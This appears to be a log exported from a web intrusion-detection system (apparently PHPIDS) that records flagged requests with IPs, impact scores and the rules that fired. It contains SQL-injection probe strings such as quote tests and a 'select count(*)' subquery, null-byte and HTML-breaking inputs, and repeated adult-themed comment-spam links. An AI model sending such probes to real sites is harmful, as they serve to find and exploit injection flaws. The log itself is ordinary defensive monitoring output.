Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122580
Name:GET.page
Value:%00
Page:/i.php?page=%2500&mode=print
IP:67.195.111.36
Impact:10
Created:2010-04-26 20:57:15
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122579
Name:REQUEST.page
Value:%00
Page:/i.php?page=%2500&mode=print
IP:67.195.111.36
Impact:10
Created:2010-04-26 20:57:14
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122577
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.40
Impact:12
Created:2010-04-26 20:47:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122578
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.40
Impact:12
Created:2010-04-26 20:47:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122575
Name:REQUEST.codeme
Value:Great, <a href= http://technorati.com/people/babeskickass >babes kick ass now</a>, [url= http://technorati.com/people/babeskickass ]babes kick ass now[/url], qztoq,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 20:23:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122576
Name:POST.codeme
Value:Great, <a href= http://technorati.com/people/babeskickass >babes kick ass now</a>, [url= http://technorati.com/people/babeskickass ]babes kick ass now[/url], qztoq,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 20:23:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122573
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/futuramaporn >futurama porn</a>, [url= http://technorati.com/people/futuramaporn ]futurama porn[/url], >:[[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 19:33:37
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122574
Name:POST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/futuramaporn >futurama porn</a>, [url= http://technorati.com/people/futuramaporn ]futurama porn[/url], >:[[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 19:33:37
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122571
Name:REQUEST.page
Value:videos/pn12/i.php?page=about
Page:/i.php?page=videos/pn12/i.php?page=about
IP:204.236.244.14
Impact:10
Created:2010-04-26 19:28:58
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122572
Name:GET.page
Value:videos/pn12/i.php?page=about
Page:/i.php?page=videos/pn12/i.php?page=about
IP:204.236.244.14
Impact:10
Created:2010-04-26 19:28:58
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122569
Name:REQUEST.page
Value:77 and(select count(*) from Pablin77)--
Page:/i.php?page=77+and(select+count(*)+from+Pablin77)--
IP:212.239.40.236
Impact:18
Created:2010-04-26 18:50:22
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122570
Name:GET.page
Value:77 and(select count(*) from Pablin77)--
Page:/i.php?page=77+and(select+count(*)+from+Pablin77)--
IP:212.239.40.236
Impact:18
Created:2010-04-26 18:50:22
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122567
Name:REQUEST.codeme
Value:Where it is possible to buy the, <a href= http://technorati.com/people/milfblowjob >Cheap milf blowjob</a>, [url= http://technorati.com/people/milfblowjob ]Cheap milf blowjob[/url], ttrxx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 18:44:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122568
Name:POST.codeme
Value:Where it is possible to buy the, <a href= http://technorati.com/people/milfblowjob >Cheap milf blowjob</a>, [url= http://technorati.com/people/milfblowjob ]Cheap milf blowjob[/url], ttrxx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 18:44:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122565
Name:REQUEST.codeme
Value:Best Wishes!, <a href= http://technorati.com/people/pamandersonsextape#1 >First pam anderson sex tape</a> [url=http://technorati.com/people/pamandersonsextape#1]First pam anderson sex tape[/url], =PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-26 17:55:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122566
Name:POST.codeme
Value:Best Wishes!, <a href= http://technorati.com/people/pamandersonsextape#1 >First pam anderson sex tape</a> [url=http://technorati.com/people/pamandersonsextape#1]First pam anderson sex tape[/url], =PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-26 17:55:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122563
Name:REQUEST.codeme
Value:Best, <a href= http://technorati.com/people/ebonyporn#1 >Buy ebony porn</a> [url=http://technorati.com/people/ebonyporn#1]Buy ebony porn[/url], zbzal,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 17:06:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122564
Name:POST.codeme
Value:Best, <a href= http://technorati.com/people/ebonyporn#1 >Buy ebony porn</a> [url=http://technorati.com/people/ebonyporn#1]Buy ebony porn[/url], zbzal,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 17:06:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122561
Name:REQUEST.codeme
Value:I have the same., <a href= http://technorati.com/people/grannyporn >granny porn</a>, [url= http://technorati.com/people/grannyporn ]granny porn[/url], 628,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 16:17:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122562
Name:POST.codeme
Value:I have the same., <a href= http://technorati.com/people/grannyporn >granny porn</a>, [url= http://technorati.com/people/grannyporn ]granny porn[/url], 628,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 16:17:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122559
Name:REQUEST.codeme
Value:So where it to find?, <a href= http://technorati.com/people/myfirstsexteacher#1 >my first sex teacher</a> [url=http://technorati.com/people/myfirstsexteacher#1]my first sex teacher[/url], isrhp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-26 14:37:07
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122560
Name:POST.codeme
Value:So where it to find?, <a href= http://technorati.com/people/myfirstsexteacher#1 >my first sex teacher</a> [url=http://technorati.com/people/myfirstsexteacher#1]my first sex teacher[/url], isrhp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-26 14:37:07
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122557
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://technorati.com/people/newdumbblondejokes#1 >Discount new dumb blonde jokes</a> [url=http://technorati.com/people/newdumbblondejokes#1]Discount new dumb blonde jokes[/url], =-PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 13:47:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122558
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://technorati.com/people/newdumbblondejokes#1 >Discount new dumb blonde jokes</a> [url=http://technorati.com/people/newdumbblondejokes#1]Discount new dumb blonde jokes[/url], =-PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 13:47:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122555
Name:REQUEST.codeme
Value:Good Job, <a href= http://technorati.com/people/bigtitsatwork >big tits at work online</a>, [url= http://technorati.com/people/bigtitsatwork ]big tits at work online[/url], 8-[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 12:58:12
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122556
Name:POST.codeme
Value:Good Job, <a href= http://technorati.com/people/bigtitsatwork >big tits at work online</a>, [url= http://technorati.com/people/bigtitsatwork ]big tits at work online[/url], 8-[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 12:58:12
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122553
Name:REQUEST.codeme
Value:Hi, <a href= http://technorati.com/people/bigtitsatwork >big tits at work</a>, [url= http://technorati.com/people/bigtitsatwork ]big tits at work[/url], :DDD,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 12:08:45
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122554
Name:POST.codeme
Value:Hi, <a href= http://technorati.com/people/bigtitsatwork >big tits at work</a>, [url= http://technorati.com/people/bigtitsatwork ]big tits at work[/url], :DDD,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 12:08:45
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122551
Name:REQUEST.codeme
Value:So where it to find?, http://technorati.com/people/freeadultvideoclips free adult video clips now, 8(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-26 11:18:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122552
Name:POST.codeme
Value:So where it to find?, http://technorati.com/people/freeadultvideoclips free adult video clips now, 8(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-26 11:18:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122549
Name:REQUEST.codeme
Value:Where it is possible to buy the, <a href= http://technorati.com/people/brokebackmountainsexscene#1 >Best brokeback mountain sex scene</a> [url=http://technorati.com/people/brokebackmountainsexscene#1]Best brokeback mountain sex scene[/url], hemqu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 10:29:38
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122550
Name:POST.codeme
Value:Where it is possible to buy the, <a href= http://technorati.com/people/brokebackmountainsexscene#1 >Best brokeback mountain sex scene</a> [url=http://technorati.com/people/brokebackmountainsexscene#1]Best brokeback mountain sex scene[/url], hemqu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 10:29:38
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122547
Name:REQUEST.codeme
Value:Best Wishes, <a href= http://technorati.com/people/freeonlinesexgames#1 >free online sex games</a> [url=http://technorati.com/people/freeonlinesexgames#1]free online sex games[/url], 13040,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 09:40:12
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122548
Name:POST.codeme
Value:Best Wishes, <a href= http://technorati.com/people/freeonlinesexgames#1 >free online sex games</a> [url=http://technorati.com/people/freeonlinesexgames#1]free online sex games[/url], 13040,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 09:40:12
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122545
Name:REQUEST.codeme
Value:Best, <a href= http://technorati.com/people/freekimpossiblesexcomic >Discount free kim possible sex comic</a>, [url= http://technorati.com/people/freekimpossiblesexcomic ]Discount free kim possible sex comic[/url], >:-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-26 08:50:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122546
Name:POST.codeme
Value:Best, <a href= http://technorati.com/people/freekimpossiblesexcomic >Discount free kim possible sex comic</a>, [url= http://technorati.com/people/freekimpossiblesexcomic ]Discount free kim possible sex comic[/url], >:-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-26 08:50:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122543
Name:REQUEST.bcsi-ac-3CDF84328BD51AF7
Value:1AD22156000000057pC0iOawm9uYIYqyhEJeUSoB eUfAAAABQAAAEpaHACAcAAAAAAAAAXPAAA=
Page:/?bcsi-ac-3CDF84328BD51AF7=1AD22156000000057pC0iOawm9uYIYqyhEJeUSoB+eUfAAAABQAAAEpaHACAcAAAAAAAAAXPAAA=
IP:174.36.36.38
Impact:22
Created:2010-04-26 07:11:28
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3
Converted: ((++:

ID:122544
Name:GET.bcsi-ac-3CDF84328BD51AF7
Value:1AD22156000000057pC0iOawm9uYIYqyhEJeUSoB eUfAAAABQAAAEpaHACAcAAAAAAAAAXPAAA=
Page:/?bcsi-ac-3CDF84328BD51AF7=1AD22156000000057pC0iOawm9uYIYqyhEJeUSoB+eUfAAAABQAAAEpaHACAcAAAAAAAAAXPAAA=
IP:174.36.36.38
Impact:22
Created:2010-04-26 07:11:28
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3
Converted: ((++:

ID:122541
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-26 07:11:25
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122542
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-26 07:11:25
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122539
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-26 05:21:44
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122540
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-26 05:21:44
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122537
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-25 21:02:50
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122538
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-25 21:02:50
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122535
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:213.189.224.16
Impact:12
Created:2010-04-25 16:50:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122536
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:213.189.224.16
Impact:12
Created:2010-04-25 16:50:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122533
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:213.189.224.16
Impact:12
Created:2010-04-25 16:47:35
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122534
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:213.189.224.16
Impact:12
Created:2010-04-25 16:47:35
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122531
Name:REQUEST.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A
IP:67.195.111.36
Impact:6
Created:2010-04-25 16:41:10
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122532
Name:GET.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A
IP:67.195.111.36
Impact:6
Created:2010-04-25 16:41:10
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122529
Name:REQUEST.page
Value:videos/samdump2auditor</a><br%20/><a%20href=
Page:/i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-04-25 15:43:37
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122530
Name:GET.page
Value:videos/samdump2auditor</a><br%20/><a%20href=
Page:/i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-04-25 15:43:37
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122527
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.34
Impact:12
Created:2010-04-25 13:20:52
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122528
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.34
Impact:12
Created:2010-04-25 13:20:52
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122523
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:66.249.67.227
Impact:12
Created:2010-04-25 12:34:29
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122524
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:66.249.67.227
Impact:12
Created:2010-04-25 12:34:29
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122525
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:174.36.36.39
Impact:12
Created:2010-04-25 12:34:29
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122526
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:174.36.36.39
Impact:12
Created:2010-04-25 12:34:29
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122521
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:66.249.67.227
Impact:12
Created:2010-04-25 12:34:28
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122522
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:66.249.67.227
Impact:12
Created:2010-04-25 12:34:28
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122519
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-25 12:34:27
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122520
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-25 12:34:27
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122517
Name:REQUEST.UserInteraction5
Value:KonaFlashBase__utma=258583378.786471358.1271812991.1271812991.1271812991.1
Page:/
IP:68.100.254.169
Impact:10
Created:2010-04-25 11:21:19
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122518
Name:COOKIE.UserInteraction5
Value:KonaFlashBase__utma=258583378.786471358.1271812991.1271812991.1271812991.1
Page:/
IP:68.100.254.169
Impact:10
Created:2010-04-25 11:21:19
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122515
Name:REQUEST.UserInteraction5
Value:KonaFlashBase__utma=258583378.786471358.1271812991.1271812991.1271812991.1
Page:/
IP:68.100.254.169
Impact:10
Created:2010-04-25 11:21:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122516
Name:COOKIE.UserInteraction5
Value:KonaFlashBase__utma=258583378.786471358.1271812991.1271812991.1271812991.1
Page:/
IP:68.100.254.169
Impact:10
Created:2010-04-25 11:21:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122511
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122512
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122513
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122514
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:06
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122509
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:04
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122510
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:12:04
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122503
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122504
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122505
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122506
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122507
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:74.208.79.46
Impact:12
Created:2010-04-25 10:11:55
Details:
